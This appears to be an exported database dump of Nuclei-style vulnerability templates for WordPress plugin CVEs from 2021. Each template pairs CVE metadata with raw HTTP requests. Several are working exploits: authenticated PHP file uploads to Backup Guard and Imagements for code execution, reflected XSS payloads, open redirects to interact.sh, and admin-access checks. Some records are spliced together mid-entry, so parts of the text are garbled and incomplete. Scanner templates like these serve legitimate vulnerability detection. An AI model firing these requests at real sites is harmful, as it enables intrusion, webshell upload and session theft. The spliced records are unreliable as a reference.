https://wordpress.org/plugins/backup/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24155\n - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24155\n cwe-id: CWE-434\n epss-score: 0.95488\n epss-percentile: 0.99234\n cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: backup-guard\n product: backup_guard\n framework: wordpress\n tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n -----------------------------204200867127808062083805313921\n Content-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------204200867127808062083805313921--\n - |\n GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_3, '{\\\"success\\\":1}')\n - contains(body_4, 'CVE-2021-24155')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};\n internal: true\n# digest: 4a0a00473045022100b8c26489e388600ed7392126a0d96153b15b0ad02bfc879d7e47473dcb14fa9e022041508bc27c2a5f188b6cd39a606c2be97099960ee8d30c9ddb535a3a22f9a31c:922c64590222798bb761d5b6d8e72950", "hash": "fcbfbc0405a9b25354c75b638dec6e3c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308295" }, "name": "CVE-2021-24165.yaml", "content": "id: CVE-2021-24165\n\ninfo:\n name: WordPress Ninja Forms <3.4.34 - Open Redirect\n author: dhiyaneshDk,daffainfo\n severity: medium\n description: |\n WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818\n - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24165\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24165\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.46774\n cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: ninjaforms\n product: ninja_forms\n framework: wordpress\n tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 302'\n - 'status_code_2 == 302'\n - \"contains(header_2, 'Location: https://interact.sh?client_id=1')\"\n condition: and\n# digest: 
4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950", "hash": "d97ae7750fe95229e30915a5fe80ddbc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308296" }, "name": "CVE-2021-24169.yaml", "content": "id: CVE-2021-24169\n\ninfo:\n name: WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise.\n remediation: Fixed in version 3.1.8.\n reference:\n - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3\n - https://www.exploit-db.com/exploits/50324\n - https://wordpress.org/plugins/woo-order-export-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24169\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24169\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58287\n cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: algolplus\n product: advanced_order_export\n framework: wordpress\n tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wc-order-export&tab= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"woo-order-export-lite\")'\n condition: and\n# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950", "hash": "1fd7a237a3b216a608a17f5a05389cf6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308297" }, "name": "CVE-2021-24176.yaml", "content": "id: CVE-2021-24176\n\ninfo:\n name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting\n author: Ganofins\n severity: medium\n description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585\n - https://wordpress.org/plugins/jh-404-logger/\n - https://ganofins.com/blog/my-first-cve-2021-24176/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24176\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-24176\n cwe-id: CWE-79\n epss-score: 0.00136\n epss-percentile: 0.48949\n cpe: 
cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jh_404_logger_project\n product: jh_404_logger\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"JH 404 Logger\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100da1d2590e32aeae01e9bde72dd44c3ec2cb17e57cc94120918a61f0ef4bc138a0220221f43062ec121f78c5630d30a32390327483712c7f64e0d182dec57735cbc88:922c64590222798bb761d5b6d8e72950", "hash": "a362fc44d38dfcac09412012ea3242f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308298" }, "name": "CVE-2021-24210.yaml", "content": "id: CVE-2021-24210\n\ninfo:\n name: WordPress PhastPress <1.111 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb\n - https://plugins.trac.wordpress.org/changeset/2497610/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24210\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24210\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.47553\n cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: kiboit\n product: phastpress\n framework: wordpress\n tags: cve2021,cve,redirect,wpscan,wordpress,kiboit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022019fc2da35b19a8aa2ac26fadb08217e95ab59fd07e05e055ea13dcbc91f66bd3022100d867bcef59606cc9f5b689b663c0f39d8bcabaa9e57ec2e1b5529182c1e85295:922c64590222798bb761d5b6d8e72950", "hash": "6a17b63f11a6ad2d68444e8c36027f92", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308299" }, "name": "CVE-2021-24214.yaml", "content": "id: CVE-2021-24214\n\ninfo:\n name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting\n author: tess\n severity: medium\n description: WordPress OpenID Connect Generic Client 
plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error message when it is output back into the login form, so the issue can be exploited without authentication in the plugin's default configuration.
490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950", "hash": "78ee0fce6b71f5bd4d3c17fb3d83fd91", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829a" }, "name": "CVE-2021-24215.yaml", "content": "id: CVE-2021-24215\n\ninfo:\n name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation\n author: r3Y3r53\n severity: critical\n description: |\n An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.\n remediation: Fixed in version 1.5.2\n reference:\n - https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24215\n - https://www.opencve.io/cve/CVE-2021-24215\n - https://m0ze.ru/vulnerability/[2021-03-18]-[WordPress]-[CWE-284]-Controlled-Admin-Access-WordPress-Plugin-v1.4.0.txt\n - https://m0ze.ru/vulnerability/%5B2021-03-18%5D-%5BWordPress%5D-%5BCWE-284%5D-Controlled-Admin-Access-WordPress-Plugin-v1.4.0.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24215\n cwe-id: CWE-425,CWE-284\n epss-score: 0.19113\n epss-percentile: 0.9615\n cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpruby\n product: controlled_admin_access\n framework: wordpress\n publicwww-query: /wp-content/plugins/controlled-admin-access/\n tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")'\n condition: and\n# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950", "hash": "79ada95082a3a39b591e5bcf644bc605", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829b" }, "name": "CVE-2021-24226.yaml", "content": "id: CVE-2021-24226\n\ninfo:\n name: AccessAlly <3.5.7 - Sensitive Information Leakage\n author: dhiyaneshDK\n severity: high\n description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. 
The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information.\n remediation: |\n Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24226\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24226\n cwe-id: CWE-200\n epss-score: 0.03058\n epss-percentile: 0.90773\n cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: accessally\n product: accessally\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '
    =2.0) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139\n - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24235\n - https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Goto-WordPress-Theme-v1.9.txt\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24235\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45944\n cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: boostifythemes\n product: goto\n framework: wordpress\n tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"input/Autofocus/%0D*/Onfocus=alert(123);\"\n - \"goto-tour-list-js-extra\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207172378464726e156cb63127750d8141c27c54fcca61e8ac543695934d8177cc0220120dd46612aca278b023793c297b93335bd16a9ce26edb7eaf12e9dd092e5052:922c64590222798bb761d5b6d8e72950", "hash": "a1bc38cee3667f338c2f6a42ae73cf2c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829e" }, "name": "CVE-2021-24236.yaml", "content": "id: \"CVE-2021-24236\"\n\ninfo:\n name: WordPress Imagements <=1.2.5 - Arbitrary File Upload\n author: pussycat0x\n severity: critical\n description: |\n WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. 
The plugin allows images to be uploaded in comments but only checks the Content-Type of the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. Note that this check itself uploads a PHP file into wp-content/plugins/imagements/images/ that is not removed afterwards; clean it up after testing.
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"naam\"\n\n {{randstr}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\n Content-Type: image/jpeg\n\n \n\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"submit\"\n\n Post Comment\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"comment_post_ID\"\n\n {{post}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"comment_parent\"\n\n 0\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n - |\n GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2021-24236\"\n# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950", "hash": "84ff748cdbce89e4d860e56ab5e41c76", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829f" }, "name": "CVE-2021-24237.yaml", "content": "id: CVE-2021-24237\n\ninfo:\n name: WordPress Realteo <=1.2.3 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. 
_bedrooms and _bathrooms GET parameters before outputting them in its properties page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability.\n reference:\n - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e\n - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24237\n - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt\n - https://www.docs.purethemes.net/findeo/knowledge-base/changelog-findeo/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24237\n cwe-id: CWE-79\n epss-score: 0.00265\n epss-percentile: 0.65501\n cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: purethemes\n product: findeo\n framework: wordpress\n tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - autofocus onfocus=alert(/{{randstr}}/);//\n - Nothing found\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204b9bcf654a4fdbd7dd7b23c12beaa5286360f594247e37850e45dce56acfa10f02210098b0b6add57f62bf6677700e736e62b4182e01c7236ca9127ab47e2746206de9:922c64590222798bb761d5b6d8e72950", "hash": "41fee0a5cd43a03da256348cd04d27c1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3082a0" }, "name": "CVE-2021-24239.yaml", "content": "id: CVE-2021-24239\n\ninfo:\n name: WordPress Pie Register <3.7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim.\n remediation: Fixed in version 3.7.0.1.\n reference:\n - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34\n - https://plugins.trac.wordpress.org/changeset/2507536/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24239\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24239\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.47461\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Pie Register'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"\") && contains(body, \"invitaion-code-table\")'\n condition: and\n# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950", "hash": "55d07d4c7f102d288557368267c8167b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a1" }, "name": "CVE-2021-24245.yaml", "content": "id: CVE-2021-24245\n\ninfo:\n name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html\n - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24245\n - http://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24245\n cwe-id: CWE-79\n epss-score: 
0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: trumani\n product: stop_spammers\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Stop Spammers Spam Prevention'\n - 'Tags:'\n condition: and\n\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP+Cookie+check;\n\n log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"ad\\\" accesskey=X onclick=alert(1)\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205917ffa809c11d9c309949d353c16ced2a39b5fd1efa927f718b4e5c1d418c1a022100ec4e71ee4005aad1c859c0a7b7b336bae761807d52ac3733efd04804c3764719:922c64590222798bb761d5b6d8e72950", "hash": "daf355acfdbde74e5a3a02e97dbb3b8b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a2" }, "name": "CVE-2021-24274.yaml", "content": "id: CVE-2021-24274\n\ninfo:\n name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to 
session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d\n - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24274\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24274\n cwe-id: CWE-79\n epss-score: 0.00201\n epss-percentile: 0.56972\n cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: ultimate_maps\n framework: wordpress\n tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950", "hash": 